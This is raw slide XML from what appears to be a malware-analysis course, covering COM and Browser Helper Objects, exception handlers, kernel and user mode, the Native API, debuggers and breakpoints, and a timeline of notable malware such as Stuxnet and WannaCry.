              <a:t>Some malware implements a malicious COM server, which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>subsequently used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>by other applications. Common COM server functionality for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>malware is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Browser Helper Objects (BHOs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, which are third-party plug-ins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>for Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Explorer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5297395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vs. Windows OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Exceptions allow a program to handle events outside the flow of normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>execution caused by errors (e.g. division by zero)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149904" y="5159060"/>
            <a:ext cx="7238520" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Exception handlers can be used in exploit code to gain execution. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>A pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>to exception-handling information is stored on the stack, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>during a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>stack overflow, an attacker can overwrite the pointer.</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841" y="3284984"/>
            <a:ext cx="5547712" cy="1392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85436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lock diagram of user-mode and kernel-mode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905299"/>
            <a:ext cx="5740896" cy="47766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Kernel vs. User mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>has two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>processor privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>levels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>mode </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>user mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SYSENTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SYSCALL</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>INT 0x2E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Kernel mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Antivirus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malware (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g.rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8812549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API</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Native API is a lower-level interface for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>interacting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Calling functions in the Native API bypasses the normal Windows API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ntdll.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kernel32.dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204"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708920"/>
            <a:ext cx="431482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04293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[Lab07]</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833884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Debugger</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Source-level debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>built into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>integrated development environments (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDEs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Assembly-level debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>operate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>on assembly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>code instead of source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Commonly used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>WinDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: kernel and user debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: user debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IDA Pro: user debugging</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257547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Real-world Impacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2010 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>Iran’s nuclear program and included the ability to impact hardware as well as software. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2011 — Zeus Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>detected in 2007, the author </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>released </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>the source code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>in 2011. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>Sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1"/>
              <a:t>Zbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>most successful pieces of botnet software in the world, impacting millions of machines. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2013 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>early </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>programs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2014 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Backoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>Point-of-Sale (POS) systems to steal credit card data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2016 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>One of the heavy-hitters in the ransomware sphere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2017 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>brought </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>major computer systems in Russia, China, ­­the UK, and the US </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>down, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>locking people out of their data and demanding they pay a ransom or lose everything. The virus affected at least 150 countries, including hospitals, banks, telecommunications companies, warehouses, and many other industries.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155868274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Debugger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Using a debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Single-Stepping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>run a single instruction and then return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>control to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the debugger. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>debugger stops after every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>instruction.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Stepping-over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>step-over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>= bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Stepping-Into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Go into the first instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Breakpoint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Software breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>stop at a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>particular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Hardware breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: stop at a location (address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Conditional breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a software breakpoint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>that will only if a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>certain condition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30183853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OllyDbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
